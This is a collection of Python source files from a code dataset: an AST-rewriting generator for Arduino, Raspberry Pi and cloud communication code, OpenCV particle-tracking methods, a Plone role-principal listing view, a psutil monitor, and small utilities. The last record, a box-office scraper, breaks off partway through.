\n num = 0\n ifSource = 'if _recieveJsonData != \"\":\\n'\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n ifSource += '\\t' + sarg + ' = _recieveJsonData[\"args' + str(num) + '\"]\\n'\n num = num + 1\n \n newAsts.append(ast.parse(ifSource))\n \n return newAsts\n \n def sendBySerialAtRaspberry(node, methval):\n #sendtest(self, methval, val1, val2, ..., valn):\n #ser=serial.Serial('/dev/ttyACM0', 9600); -> option으로 device, baud rate\n #{\"Serial\":[dev:'/dev/ttyACM0', baudrate:9600]}\n\n #ser.write(metval)\n #ser.write(val1)\n #ser.write(val2)\n # ...\n #ser.write(valn)\n newAsts = []\n \n if 'serial' not in replaceAST.importList:\n replaceAST.importList.append('serial')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('global ser'))\n newAsts.append(ast.parse('ser = serial.Serial(\"/dev/ttyACM0\", 9600)'))\n\n smethval = CommLib.unparseExpr(methval)\n \n newAsts.append(ast.parse('_sendData = {}'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('ser.write(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.write(\"\\\\n\".encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n\n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('ser.write(_jsonData.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.write(\"\\\\n\".encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.close()'))\n \n return newAsts\n \n def sendBySocketAtRaspberry(node, methval): \n \n newAsts = []\n \n if 'socket' not in replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n smethval = CommLib.unparseExpr(methval)\n \n newAsts.append(ast.parse('_sendData = {}'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('conn.sendall(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n \n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('conn.sendall(_sendData.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('conn.close()'))\n \n return newAsts\n \n def recieveBySocketAtRaspberry(node):\n # sendtest(data)\n \n # _jsonData = json.loads(_recieveData)\n \n # args1 = _recieveData[\"args1\"]\n # args2 = _recieveData[\"args2\"]\n # ...\n # argsn = _recieveData[\"argsn\"]\n \n newAsts = []\n \n if 'socket' not in replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n \n newAsts.append(ast.parse('_recieveData = \"\"'))\n newAsts.append(ast.parse('_cnt = 0'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n newAsts.append(ast.parse(source))\n newAsts.append(ast.parse('global _jsonData'))\n \n ifSource = 'if _recieveData != \"\":\\n' + '\\t_jsonData = json.loads(_recieveData)\\n'\n ifSource += 'else:\\n' + '\\t_jsonData = \"\"\\n'\n newAsts.append(ast.parse(ifSource))\n \n num = 0\n \n ifSource = 'if _jsonData != \"\":\\n'\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n ifSource += '\\t' + sarg + ' = _jsonData[\"args' + str(num) + '\"]\\n'\n num = num + 1\n \n newAsts.append(ast.parse(ifSource))\n \n return newAsts\n \n def sendBySocketAtMobile(node, methval):\n \n newAsts = []\n \n if 'socket' not in replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('_writer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n\n smethval = CommLib.unparseExpr(methval)\n newAsts.append(ast.parse('_sendData = {}'))\n \n sparm = CommLib.unparseExpr(node.value.args[0])\n newAsts.append(ast.parse('_writer_tup = ' + sparm))\n newAsts.append(ast.parse('_writer.connect(_writer_tup)'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('_writer.sendall(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n\n num = 0\n \n for arg in node.value.args[1:]:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('_writer.sendall(_jsonData.encode(\"utf-8\"))'))\n \n return newAsts\n \n def sendByHttpAtMobile(node, methval, targets):\n # getDoorlist()\n \n #door_arr = MyCloud.doorlist()\n #while((line = buffer.readLine()) != null)\n \n newAsts = []\n num = 0\n ipAddress = \"\"\n \n smethval = CommLib.unparseExpr(methval)\n newAsts.append(ast.parse(\"_field_dict = {}\"))\n newAsts.append(ast.parse('_field_dict[\"_funid\"] = ' + smethval))\n \n if 'urllib3' not in replaceAST.importList:\n replaceAST.importList.append('urllib3')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n if arg == node.value.args[0]:\n ipAddress = sarg\n else:\n newAsts.append(ast.parse('_field_dict[\"args' + str(num) + '\"] = ' + sarg))\n num += 1\n \n newAsts.append(ast.parse(\"req = urllib3.PoolManager()\"))\n \n for target in targets:\n starget = CommLib.unparseExpr(target)\n targetAst = ast.parse('_' + starget + ' = req.request(\"POST\", ' + ipAddress + ', fields = _field_dict).data.decode(\"utf-8\")')\n newAsts.append(targetAst)\n jsonAst = ast.parse(starget + ' = json.loads(_' + starget + ')')\n newAsts.append(jsonAst)\n \n return newAsts\n \n def sendByHttpAtRaspberry(node, methval, targets):\n \n newAsts = []\n num = 0\n ipAddress = \"\"\n \n smethval = CommLib.unparseExpr(methval)\n newAsts.append(ast.parse(\"_field_dict = {}\"))\n newAsts.append(ast.parse(\"_field_dict['_funid'] = \" + smethval))\n \n if 'urllib3' not in replaceAST.importList:\n replaceAST.importList.append('urllib3')\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n if arg == node.value.args[0]:\n ipAddress = sarg\n else:\n newAsts.append(ast.parse(\"_field_dict['args\" + str(num) +\"'] = \" + sarg))\n num += 1\n \n newAsts.append(ast.parse(\"req = urllib3.PoolManager()\"))\n \n if targets != []: \n for target in targets:\n starget = CommLib.unparseExpr(target)\n newAsts.append(ast.parse(starget + ' = req.request(\"POST\", ' + ipAddress + ', fields = _field_dict)'))\n else:\n newAsts.append(ast.parse(\"req.request('POST', \" + ipAddress + \", fields = _field_dict)\"))\n \n return newAsts\n \n def recieveByHttpAtMobile(node):\n return []\n \n def sendByHttpAtCloud(node, methval):\n return []\n \n def recieveByHttpAtCloud(node):\n newAsts = []\n num = 2\n \n if 'sys' not in replaceAST.importList:\n replaceAST.importList.append('sys')\n \n if node.args.args != []:\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse(sarg + ' = sys.argv[' + str(num) + ']'))\n num = num + 1\n \n return newAsts\n\n def unparseStmt(tree):\n sio = io.StringIO()\n astunparse.Unparser(tree, sio)\n \n s = sio.getvalue().split(\"\\n\")[1]\n \n return s\n \n def unparseExpr(tree):\n if type(tree).__name__ == 'Str':\n return tree.s\n else:\n sio = io.StringIO()\n astunparse.Unparser(tree, sio)\n \n s = sio.getvalue().split(\"\\n\")[0]\n \n return s\n \nclass TableGenVisitor(ast.NodeVisitor): \n def __init__(self):\n self.isDef = False\n self.className = \"\"\n self.num = 0\n global classArr\n global methodArr\n global allLocProcList\n classArr = {}\n methodArr = {}\n allLocProcList = []\n \n \n def generic_visit(self, node):\n if type(node).__name__ == 'ClassDef':\n self.isDef = True\n self.className = node.name\n\n # 상속 받는 방법에 따라 통신 방법을 달리 해줌\n if node.bases[0].id == 'Arduino' or node.bases[0].id == 'Raspberry' or node.bases[0].id == 'Cloud' or node.bases[0].id == 'Mobile':\n classArr[self.className] = node.bases[0].id\n\n # class 별 method list로 구성\n if type(node).__name__ == 'FunctionDef':\n name = node.name\n methodArr[node.name] = self.className\n allLocProcList.append((self.className, node.name, self.num))\n self.num = self.num + 1\n \n ast.NodeVisitor.generic_visit(self, node)\n \nclass FindCalleeCaller(ast.NodeVisitor):\n def __init__(self):\n self.className = \"\"\n global calleeArr\n calleeArr = []\n global localFunc\n localFunc = []\n \n def visit_Module(self, node):\n self.generic_visit(node)\n global localFunc\n \n tmp = []\n for funcName in localFunc:\n tmp.append(funcName)\n \n for funcName in localFunc:\n for locProc in allLocProcList:\n if classArr.get(locProc[0]) == 'Arduino':\n if locProc[1] == funcName:\n break\n else:\n del tmp[tmp.index(funcName)]\n \n localFunc.clear()\n localFunc = tmp\n \n def visit_ClassDef(self, node):\n self.className = node.name\n \n self.generic_visit(node)\n \n def visit_Call(self, node):\n if type(node.func).__name__ == 'Attribute':\n callee = methodArr.get(node.func.attr)\n \n if callee is not None and not(calleeArr.__contains__((node.func.attr, callee, self.className))):\n calleeArr.append((node.func.attr, callee, self.className)) \n elif type(node.func).__name__ == 'Name':\n if classArr.get(self.className) == 'Arduino':\n localFunc.append(node.func.id)\n\nprint (\"1: door state, 2: control, 3: DB content, 4: total case, 5: custom case\")\nselection = input(\"Enter the number : \")\n\nfirstCase = \"case1_input/unipyprogram_doorstate.txt\"\nfirstOutput = \"case1_input/output\"\nsecondCase = \"case2_input/unipyprogram_control.txt\"\nsecondOutput = \"case2_input/output\"\nthirdCase = \"case3_input/unipyprogram_dbcontent.txt\"\nthirdOutput = \"case3_input/output\"\nfourthCase = \"unipy/unipy_input.txt\"\nfourthOutput = \"unipy/output\"\n\nfullPath = \"\"\nfileName = \"\"\ndirectory = \"\"\nfilename = \"\"\n\nif selection == '1':\n fullPath = firstCase\n fileName = firstOutput\nelif selection == '2':\n fullPath = secondCase\n fileName = secondOutput\nelif selection == '3':\n fullPath = thirdCase\n fileName = thirdOutput\nelif selection == '4':\n fullPath = fourthCase\n fileName = fourthOutput\nelif selection == '5':\n directory = input(\"Enter the working directory : \")\n filename = input(\"Enter the filename : \")\n fullPath = directory + \"/\" + filename\n fileName = directory + \"/output\"\nelse:\n sys.exit(1)\n\n# 파이썬의 파일을 읽어와서 문자열로 변환\nf = open(fullPath, 'r+')\ncontent = f.read()\n\n# 문자열을 파싱 -> 방문 기록\nx = TableGenVisitor()\nt = ast.parse(content)\n\nx.visit(t)\n\nf = FindCalleeCaller()\nf.visit(t)\n\nreplace_ast = replaceAST()\nnewT = replace_ast.visit(t)\n\n#codegen(newT)\n\nfileGen = distFile(fileName)\nfileGen.visit(newT)\n","sub_path":"UnipyProgram.py","file_name":"UnipyProgram.py","file_ext":"py","file_size_in_byte":41307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"460568662","text":"import cv2\nimport numpy as np\nimport trackpy as tp\nfrom ParticleTrackingGui.general.parameters import get_param_val, get_method_key\nimport pandas as pd\nimport ParticleTrackingGui.tracking.intensity_methods as im\n\n\n'''\n--------------------------------------------------------------------------------------------\n--------------------------------------------------------------------------------------------\nTracking Methods\n--------------------------------------------------------------------------------------------\n--------------------------------------------------------------------------------------------\n\n'''\n\ndef trackpy(frame,_, parameters=None, call_num=None):\n method_key = get_method_key('trackpy', call_num)\n df = tp.locate(frame, get_param_val(parameters[method_key]['size_estimate']), invert=get_param_val(parameters[method_key]['invert']))\n\n if parameters[method_key]['get_intensities']:\n x = df['x'].to_numpy()\n y = df['y'].to_numpy()\n intensity = []\n for i in range(np.size(x)):\n xc = x[i]\n yc = y[i]\n rc = get_param_val(parameters[method_key]['intensity_radius'])\n\n try:\n # Try because some circles overlap the edge giving meaningless answers\n cut_out_frame = frame[int(yc - rc):int(yc + rc), int(xc - rc):int(xc + rc)]\n h, w = cut_out_frame.shape[:2]\n mask = create_circular_mask(h, w)\n masked_img = cut_out_frame.copy()\n masked_img[~mask] = 0\n value = getattr(im, parameters[method_key]['get_intensities'])(masked_img)\n except:\n value = np.Nan\n\n intensity.append(value)\n df['intensities'] = np.array(intensity)\n return df\n\ndef hough(frame, _,parameters=None, call_num=None):\n '''\n Performs the opencv hough circles transform to locate\n circles in an image.\n\n :param frame:\n :param parameters:\n :param call_num:\n :return:\n '''\n method_key = get_method_key('hough', call_num)\n\n circles = np.squeeze(cv2.HoughCircles(\n frame,\n cv2.HOUGH_GRADIENT, 1,\n get_param_val(parameters[method_key]['min_dist']),\n param1=get_param_val(parameters[method_key]['p1']),\n param2=get_param_val(parameters[method_key]['p2']),\n minRadius=get_param_val(parameters[method_key]['min_rad']),\n maxRadius=get_param_val(parameters[method_key]['max_rad'])))\n\n try:\n circles_dict = {'x': circles[:, 0], 'y': circles[:, 1], 'r': circles[:, 2]}\n except:\n circles_dict={'x':[1],'y':[1],'r':[5]}\n\n\n if parameters[method_key]['get_intensities']:\n intensity = []\n for i,_ in enumerate(circles_dict['x']):\n xc = circles_dict['x'][i]\n yc = circles_dict['y'][i]\n rc = circles_dict['r'][i]\n\n try:\n #Try because some circles overlap the edge giving meaningless answers\n cut_out_frame = frame[int(yc - rc):int(yc + rc), int(xc - rc):int(xc + rc)]\n h,w= cut_out_frame.shape[:2]\n mask = create_circular_mask(h, w)\n masked_img = cut_out_frame.copy()\n masked_img[~mask] = 0\n value = getattr(im, parameters[method_key]['get_intensities'])(masked_img)\n except:\n value = np.Nan\n\n intensity.append(value)\n\n circles_dict['intensities']=np.array(intensity)\n\n df = pd.DataFrame(circles_dict)\n\n return df\n\n\n\ndef boxes(frame, _,parameters=None, call_num=None):\n '''\n boxes method finds contour of object but reduces the info to\n a rotated bounding box. Use for finding an angle of object or\n estimate of size.\n '''\n method_key = get_method_key('boxes',call_num=call_num)\n params = parameters[method_key]\n get_intensities = params['get_intensities']\n\n area_min = get_param_val(params['area_min'])\n area_max = get_param_val(params['area_max'])\n info = []\n contour_pts = _find_contours(frame)\n\n for index, contour in enumerate(contour_pts):\n area = int(cv2.contourArea(contour))\n if (area < area_max) and (area >= area_min):\n info_contour = _rotated_bounding_rectangle(contour)\n cx, cy = np.mean(info_contour[5], axis=0)\n angle = info_contour[2]\n width = info_contour[3]\n length = info_contour[4]\n box = info_contour[5]\n\n if get_intensities:\n intensity = _find_intensity_inside_contour(contour, frame, parameters['get_intensities'])\n info_contour = [cx, cy, angle, width, length, contour, box, intensity]\n else:\n info_contour = [cx, cy, angle, width, length, contour, box]\n info.append(info_contour)\n\n if get_intensities:\n info_headings = ['x', 'y', 'theta', 'width', 'length', 'contours','box', 'intensities']\n else:\n info_headings = ['x', 'y', 'theta', 'width', 'length', 'contours','box']\n df = pd.DataFrame(data=info, columns=info_headings)\n return df\n\ndef contours(pp_frame, frame, parameters=None, call_num=None):\n '''\n boxes method finds contour of object but reduces the info to\n a rotated bounding box. Use for finding an angle of object or\n estimate of size. If you need to do something with the pixels\n use contours instead.\n\n contours stores: the centroid cx, cy, area enclosed by contour,\n the bounding rectangle which is used with contour to generate\n mask so that you can extract pixels from original image\n and perform some analysis.\n '''\n sz = np.shape(frame)\n if np.shape(sz)[0] == 3:\n frame= cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n method_key = get_method_key('contours',call_num=call_num)\n params = parameters[method_key]\n get_intensities = params['get_intensities']\n\n area_min = get_param_val(params['area_min'])\n area_max = get_param_val(params['area_max'])\n info = []\n\n contour_pts = _find_contours(pp_frame)\n\n for index, contour in enumerate(contour_pts):\n M = cv2.moments(contour)\n if M['m00'] > 0:\n area = cv2.contourArea(contour)\n if (area < area_max) & (area > area_min):\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n box = cv2.boundingRect(contour)\n if get_intensities:\n intensity = _find_intensity_inside_contour(contour, frame, params['get_intensities'])\n info_contour = [cx, cy, area, contour, box, intensity]\n else:\n info_contour = [cx, cy, area, contour, box]\n info.append(info_contour)\n\n if get_intensities:\n info_headings = ['x', 'y', 'area', 'contours', 'boxes', 'intensities']\n else:\n info_headings = ['x', 'y', 'area', 'contours', 'boxes']\n df = pd.DataFrame(data=info, columns=info_headings)\n\n return df\n\n\n'''\n------------------------------------------------------------------------\nSupporting functions\n------------------------------------------------------------------------\n'''\ndef create_circular_mask(h, w, center=None, radius=None):\n\n if center is None: # use the middle of the image\n center = (int(w/2), int(h/2))\n if radius is None: # use the smallest distance between the center and image walls\n radius = min(center[0], center[1], w-center[0], h-center[1])\n\n Y, X = np.ogrid[:h, :w]\n dist_from_center = np.sqrt((X - center[0])**2 + (Y-center[1])**2)\n\n mask = dist_from_center <= radius\n return mask\n\ndef _find_contours(img, hierarchy=False):\n \"\"\"\n contours is a tuple containing (img, contours)\n \"\"\"\n # work for any version of opencv\n try:\n im, contours, hier = cv2.findContours(\n img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n except:\n contours, hier = cv2.findContours(\n img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n if hierarchy:\n return contours, hier\n else:\n return contours\n\n\n\ndef _rotated_bounding_rectangle(contour):\n rect = cv2.minAreaRect(contour)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n dim = np.sort(rect[1])\n\n #[centrex, centrey, angle, length, width, box_corners]\n info = [rect[0][0], rect[0][1], rect[2], dim[0], dim[1], box]\n return info\n\ndef _draw_contours(img, contours, col=(0,0,255), thickness=1):\n \"\"\"\n\n :param img:\n :param contours:\n :param col: Can be a defined colour in colors.py or a list of tuples(3,1) of colors of length contours\n :param thickness: -1 fills the contour.\n :return:\n \"\"\"\n if thickness == -1:\n thickness = cv2.FILLED\n\n if (np.size(np.shape(col)) == 0) | (np.size(np.shape(col)) == 1):\n img = cv2.drawContours(img, [contours], -1, col, thickness)\n else:\n for i, contour in enumerate(contours):\n img = cv2.drawContours(img, contour, -1, col[i], thickness)\n return img\n\ndef _find_intensity_inside_contour(contour, frame, intensity_method):\n #find bounding rectangle\n x,y,w,h = cv2.boundingRect(contour)\n cut_out_frame = frame[y:y+h,x:x+w]\n shifted_contour = contour - [x,y]\n mask = np.zeros((h,w,3))\n mask = _draw_contours(mask, shifted_contour,col=(255,255,255),thickness=-1)\n cut_out_frame[~(mask[:,:,0] > 0)] = 0\n value = getattr(im, intensity_method)(cut_out_frame)\n return value\n\n\n\n\n\n","sub_path":"tracking/tracking_methods.py","file_name":"tracking_methods.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"588501509","text":"from plone import api\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.Five.browser import BrowserView\nfrom zope.component.hooks import getSite\n\n\ndef get_principals_from_local_roles(obj):\n local_roles = obj.get_local_roles()\n principals = [assignment[0] for assignment in local_roles]\n return principals\n\n\ndef get_principals_from_role_manager():\n site = getSite()\n role_manager = site.acl_users.portal_role_manager\n principal_roles = list(role_manager._principal_roles.items())\n principals = [assignment[0] for assignment in principal_roles]\n return principals\n\n\ndef get_all_role_principals(context):\n path = '/'.join(context.getPhysicalPath())\n catalog = api.portal.get_tool('portal_catalog')\n brains = catalog.unrestrictedSearchResults(path=path)\n\n all_principals = set()\n for brain in brains:\n obj = brain.getObject()\n principals = get_principals_from_local_roles(obj)\n all_principals.update(principals)\n\n if IPloneSiteRoot.providedBy(context):\n # Invoked on Plone site - include local roles of Plone site in\n # search since the Plone site isn't catalogued\n site = context\n principals = get_principals_from_local_roles(site)\n all_principals.update(principals)\n\n # Include principals from portal_role_manager\n principals = get_principals_from_role_manager()\n all_principals.update(principals)\n return all_principals\n\n\nclass ListRolePrincipalsView(BrowserView):\n \"\"\"Lists all the unique principals that are used in role assignments\n (below the adapted context).\n\n Also includes the Plone site (if called on site root) and any principals\n from global role assignments in portal_role_manager.\n \"\"\"\n\n def __call__(self):\n all_principals = get_all_role_principals(self.context)\n result = '\\n'.join(sorted(p for p in all_principals))\n return result\n","sub_path":"opengever/maintenance/browser/list_role_principals.py","file_name":"list_role_principals.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174919270","text":"# Copyright 2013 Devsim LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport devsim\nimport test_common\n\ndevice=\"MyDevice\"\nregion=\"MyRegion\"\n\ntest_common.CreateSimpleMesh(device, region)\n\nfor name, equation in (\n (\"test1\", \"log(-1)\"),\n (\"test2\", \"log(x)\"),\n):\n devsim.node_model(device=device, region=region, name=name, equation=equation)\n try:\n print(devsim.get_node_model_values(device=device, region=region, name=name))\n except devsim.error as x:\n print(x)\n\n","sub_path":"testing/fpetest1.py","file_name":"fpetest1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645647016","text":"from configparser import ConfigParser\nimport datetime\nimport json\nfrom prettytable import PrettyTable\nimport psutil\nfrom time import sleep\n\n\ndef cat():\n print(str(\"(=^・ェ・^=)\"))\n return print()\n\n\ndef pretty():\n myt = PrettyTable()\n myt.field_names = [\n \"CPU,%\", \"Memory(rss)\", \"Used VMemory\",\n \"IO (write)\", \"Network(sent)\"\n ]\n myt.add_row([cpu, memory, vmemory, io, network])\n return myt.get_string()\n\n\ndef write_text(z):\n out_file = open(\"output.txt\", \"a\")\n out_file.write(\"SNAPSHOT \" + str(count) + \" : \" + '\\n')\n out_file.write(\"Date: \" + date + '\\t' + time + '\\n')\n out_file.write(z + '\\n')\n out_file.write('\\n' + '\\n')\n out_file.close()\n\n\ndef write_json(y):\n out_file = open(\"output_json\", \"a\")\n out_file.write(\"SNAPSHOT \" + str(count) + \" : \" + '\\n')\n out_file.write(\"Date: \" + date + '\\t' + time + '\\n')\n out_file.write(json.dumps(y + '\\n'))\n out_file.write('\\n' + '\\n')\n out_file.close()\n\n\ncat()\ncount = 1\n\nparser = ConfigParser()\nparser.read('input.txt')\ninterval = int(parser.get('common', 'interval'))\noutput = (parser.get('common', 'output'))\n\nprint(\"Interval = \", interval)\nprint(\"Output type = \", output)\n\nif output == \"text\":\n while True:\n cpu = str(psutil.cpu_percent())\n memory = str(psutil.Process().memory_info().rss / (1024 * 1024))\n vmemory = str(psutil.virtual_memory().used / (1024 * 1024))\n io = str(psutil.disk_io_counters().write_bytes / (1024 * 1024))\n network = str(psutil.net_io_counters().bytes_sent / (1024 * 1024))\n time = str(datetime.datetime.now().time())\n date = str(datetime.datetime.now().date())\n write_text(pretty())\n count += 1\n sleep(interval)\n\n\nif output == \"json\":\n while True:\n cpu = str(psutil.cpu_percent())\n memory = str(psutil.Process().memory_info().rss / (1024 * 1024))\n vmemory = str(psutil.virtual_memory().used / (1024 * 1024))\n io = str(psutil.disk_io_counters().write_bytes / (1024 * 1024))\n network = str(psutil.net_io_counters().bytes_sent / (1024 * 1024))\n time = str(datetime.datetime.now().time())\n date = str(datetime.datetime.now().date())\n write_json(pretty())\n count += 1\n sleep(interval)\n","sub_path":"homework3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"379765888","text":"# SPDX-FileCopyrightText: 2022 Dan Halbert for Adafruit Industries\n#\n# SPDX-License-Identifier: MIT\n\nimport keypad\nimport board\n\nkm = keypad.KeyMatrix(\n row_pins=(board.D0, board.D1, board.D2, board.D3),\n column_pins=(board.D4, board.D5, board.D6),\n columns_to_anodes=True,\n)\n\nwhile True:\n event = km.events.get()\n if event:\n print(event)\n","sub_path":"Keypad_Examples/keymatrix_columns_to_anodes/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541231113","text":"import os\r\nfrom operator import itemgetter\r\n\r\ndirName = os.path.normpath(os.path.join(os.getcwd(), 'Source'))\r\ndestinationFileName = os.path.normpath(os.path.join(os.getcwd(), 'list.txt'))\r\naData = []\r\n\r\nnames = os.listdir(dirName)\r\nfor name in names:\r\n fullname = os.path.join(dirName, name)\r\n if os.path.isfile(fullname):\r\n with open(fullname, 'r', encoding=\"utf-8\") as f:\r\n lines = f.readlines()\r\n line = lines[1]\r\n line = line.replace(''','\\'')\r\n line = line.replace('\\'\\'','\\'')\r\n line = line.replace('&','&')\r\n if line[0:9] != '\"\",\"\",\"\",':\r\n #print(line[1:-2])\r\n data = line[1:-2].split('\",\"')\r\n title = data[0]\r\n album = data[1]\r\n performer = data[2]\r\n score = data[4]\r\n deleted = data[6]\r\n if len(deleted) == 0:\r\n aData.append([performer, album, title, score, deleted])\r\n\r\naData.sort(key=itemgetter(0,1,2))\r\n\r\nwith open(destinationFileName, 'w', encoding=\"utf-8\") as f:\r\n f.write('\\\"Performer\\\",\"Album\\\",\"Title\\\",\"Score\\\",\"Deleted\\\"\\n')\r\n for item in aData:\r\n f.write('\\\"'+item[0]+'\\\",\"'+item[1]+'\\\",\"'+item[2]+'\\\",\"'+item[3]+'\\\",\"'+item[4]+'\\\"\\n')\r\n","sub_path":"make_list.py","file_name":"make_list.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277001016","text":"import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport glob,os,math,time\r\n\r\n\r\ndef left_time_estimation(round_time,remain_workload):\r\n left_time = remain_workload * round_time\r\n if left_time < 3600:\r\n time_estimation = str(math.modf(left_time/60)[1])\r\n seconds = str(round(math.modf(math.modf(left_time/60)[0])[0]*60,3))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 3600 and left_time < 86400:\r\n time_estimation = str(math.modf(left_time/60/60)[1])\r\n mins = str(math.modf(math.modf(left_time/60/60)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(left_time/60/60)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 86400 and left_time < 172800:\r\n time_estimation = str(math.modf(left_time/60/60/24)[1])\r\n hours = str(math.modf(math.modf(left_time/60/60/24)[0]*24)[1])\r\n mins = str(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] day ' + '[ ' + hours + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 172800:\r\n time_estimation = str(math.modf(left_time/60/60/24)[1])\r\n hours = str(math.modf(math.modf(left_time/60/60/24)[0]*24)[1])\r\n mins = str(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] days ' + '[ ' + hours + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n\r\n\r\ndef parsing_each_day_link():\r\n\r\n assert str(os.listdir('box_office_pages')) != '[]', \\\r\n \"You should download each year's page first!\\n\\nCheck if you have run [ web_scrapping.py ]\"\r\n\r\n link_data = pd.DataFrame()\r\n\r\n for one_file in glob.glob('box_office_pages/*.html'):\r\n loads = [file for file in glob.glob('box_office_pages/*.html')]\r\n position = loads.index(one_file)\r\n remain_workload = len(loads) - position\r\n round_s_time = time.time()\r\n\r\n f = open(one_file,'r',encoding = 'utf-8')\r\n html = f.read()\r\n f.close()\r\n soup = BeautifulSoup(html,'html.parser')\r\n tds = soup.find_all('td', class_='a-text-left mojo-header-column mojo-truncate mojo-field-type-date_interval mojo-sort-column')\r\n for item in tds:\r\n date_link = item.find('a').get('href')\r\n full_link = 'https://www.boxofficemojo.com/' + date_link\r\n date = item.find('a').get_text()\r\n link_data = link_data.append({\r\n 'Dates':date,\r\n 'Links':full_link\r\n 